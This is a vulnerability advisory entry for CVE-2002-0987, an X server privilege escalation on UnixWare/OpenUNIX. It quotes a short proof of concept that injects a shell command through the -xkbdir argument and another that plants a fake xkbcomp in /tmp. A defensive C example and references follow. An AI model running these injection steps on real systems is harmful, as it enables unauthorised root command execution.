Open UNIX 8.0.0 UnixWare 7.1.1 X Server Insecure popen Call Vulnerability


Vulnerability ID: 1106949
Vulnerability type: Input validation
Published: 2002-08-27
Updated: 2005-05-02
CVE ID: CVE-2002-0987
CNNVD-ID: CNNVD-200209-066
Platform: Unix
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/21758
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-066
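|Vulnerability details
UnixWare/OpenUNIX is a commercial UNIX operating system distributed and maintained by Caldera. The X server in UnixWare/OpenUNIX calls unsafe system functions, and a local attacker can exploit this vulnerability to execute arbitrary commands on the system with the privileges of the X server process. According to the report, the X server in UnixWare/OpenUNIX does not drop its special privileges before calling xkbcomp via the unsafe system function popen(). An attacker can submit arbitrary system commands containing metacharacters, which are then executed with the privileges of the X server process, resulting in privilege escalation.
|Exploit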
source: http://www.securityfocus.com/bid/5575/info

Caldera's X Server implementation invokes external commands without dropping existing privilege levels. Xserver calls xkbcomp, and other related utilities, in an unsecure manner using the popen() or system() calls. While this would not typically be an issue, as execution of the binary would typically result in the execution of code in the security context of the invoking user, the xkbcomp utility is executed by the Xserver process before privileges are dropped.

This weakness can be exploited by a local attacker to execute arbitrary commands with elevated privileges.

$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]
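
A defensive counterpart to the two invocations above, as an added example that is not from the original advisory or from Caldera's code: the child gives up privilege before running a helper, passes the directory as a single argv entry through execve() instead of a popen()/system() shell string, and takes the helper from a fixed absolute path rather than from the user-supplied directory. The names xkbdir_ok and run_helper, the character allowlist and the /bin/ls stand-in helper are assumptions.

```c
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist for a directory argument: absolute path, only [A-Za-z0-9._/-],
 * and no ".." sequence. Returns 1 if acceptable, 0 otherwise. */
int xkbdir_ok(const char *dir)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._/-";
    if (dir == NULL || dir[0] != '/' || strstr(dir, "..") != NULL)
        return 0;
    return dir[strspn(dir, ok)] == '\0';
}

/* Child drops to the real uid/gid for good, then execve()s the helper by
 * absolute path. Returns the helper's exit status, or -1 on failure. */
int run_helper(const char *helper, const char *arg)
{
    char path_env[] = "PATH=/usr/bin:/bin";
    char *const argv[] = { (char *)helper, (char *)arg, NULL };
    char *const envp[] = { path_env, NULL };
    int status;
    pid_t pid;

    if (helper == NULL || helper[0] != '/' || arg == NULL)
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Group first: after setuid() the process may no longer setgid(). */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0 ||
            geteuid() != getuid() || getegid() != getgid())
            _exit(126);
        execve(helper, argv, envp);  /* arg is one argv entry, no shell */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    /* "/bin/ls" is a stand-in helper; the page gives no path for xkbcomp. */
    if (argc != 2 || !xkbdir_ok(argv[1]))
        return 2;
    return run_helper("/bin/ls", argv[1]);
}
```

Validation and shell-free execution are independent layers: even when a string with metacharacters reaches run_helper(), it is only ever a file name to the helper.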
|References

Source: BID
Name: 5575
Link: http://www.securityfocus.com/bid/5575
Source: OSVDB
Name: 5044
Link: http://www.osvdb.org/5044
Source: XF
Name: openunix-unixware-xsco-privileges(9976)
Link: http://www.iss.net/security_center/static/9976.php
Source: CALDERA
Name: CSSA-2002-SCO.38
Link: ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38
